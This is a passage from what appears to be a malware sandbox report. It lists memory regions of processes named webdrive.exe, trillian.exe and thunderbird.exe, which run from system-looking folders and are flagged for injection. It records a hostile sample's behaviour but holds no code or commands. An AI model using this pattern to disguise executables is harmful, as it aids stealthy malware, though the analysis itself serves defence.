"dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1791 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1792 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1793 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1794 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1795 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1796 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1797 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1798 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1799 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1800 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1801 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1802 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1803 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1804 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1805 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1806 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1807 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1808 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1809 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1810 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1811 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1812 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1814 start_va = 0x2a10000 end_va = 0x2b19fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a10000" filename = "" Thread: id = 111 os_tid = 0x1104 Process: id = "13" image_name = "webdrive.exe" filename = "c:\\program files (x86)\\windowspowershell\\webdrive.exe" page_root = "0x5e11a000" os_pid = "0x1110" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1815 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1816 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1817 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1818 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1819 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1820 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1821 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1822 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1823 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1824 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1825 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1826 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1827 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1828 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1829 start_va = 0x450000 end_va = 0x50dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1830 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1831 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1832 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 1833 start_va = 0xb20000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1834 start_va = 0xb30000 end_va = 0xbebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 1835 start_va = 0xc50000 end_va = 0xc66fff monitored = 0 entry_point = 0xc514a1 region_type = mapped_file name = "webdrive.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\webdrive.exe") Region: id = 1836 start_va = 0xc70000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 1837 start_va = 0x2070000 end_va = 0x2a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 1838 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1839 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1840 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1841 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1842 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1843 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1844 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1845 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1846 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1847 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1848 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1849 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1850 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1851 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1852 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1853 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1854 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1855 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1856 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1857 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1858 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1859 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1860 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1861 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1862 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1863 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1865 start_va = 0x2a40000 end_va = 0x2b93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Thread: id = 112 os_tid = 0x1114 Process: id = "14" image_name = "trillian.exe" filename = "c:\\program files (x86)\\microsoft.net\\trillian.exe" page_root = "0x5f734000" os_pid = "0x1118" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\trillian.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1866 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1867 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1868 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1869 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1870 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1871 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1872 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 1873 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1874 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1875 start_va = 0x120000 end_va = 0x136fff monitored = 0 entry_point = 0x1214a1 region_type = mapped_file name = "trillian.exe" filename = "\\Program Files (x86)\\Microsoft.NET\\trillian.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\trillian.exe") Region: id = 1876 start_va = 0x140000 end_va = 0x1fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1877 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1878 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1879 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1880 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1881 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1882 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1883 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1884 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 1885 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 1886 start_va = 0x1f20000 end_va = 0x1fdbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 1887 start_va = 0x2000000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1888 start_va = 0x2010000 end_va = 0x29d3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002010000" filename = "" Region: id = 1889 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1890 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1891 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1892 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1893 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1894 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1895 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1896 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1897 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1898 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1899 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1900 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1901 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1902 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1903 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1904 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1905 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1906 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1907 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1908 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1909 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1910 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1911 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1912 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1913 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1914 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 1916 start_va = 0x650000 end_va = 0x735fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Thread: id = 113 os_tid = 0x111c Process: id = "15" image_name = "thunderbird.exe" filename = "c:\\program files\\windows journal\\thunderbird.exe" page_root = "0x63b5c000" os_pid = "0x1124" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Journal\\thunderbird.exe\" " cur_dir = "C:\\Program Files\\Windows Journal\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1918 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1919 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1920 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1921 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1922 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1923 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1924 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1925 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 